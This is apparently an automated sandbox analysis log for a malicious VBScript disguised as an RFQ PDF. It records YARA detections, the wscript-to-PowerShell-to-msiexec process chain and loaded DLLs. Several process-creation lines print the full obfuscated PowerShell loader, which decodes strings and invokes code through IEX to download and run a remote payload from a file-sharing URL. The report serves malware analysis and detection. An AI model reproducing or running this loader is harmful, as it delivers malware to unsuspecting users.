              Source: amsi64_7100.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6288.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/11@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Solidifiable.SchJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4092
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7100
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6288
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RFQ_24196MR_PDF.vbsReversingLabs: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
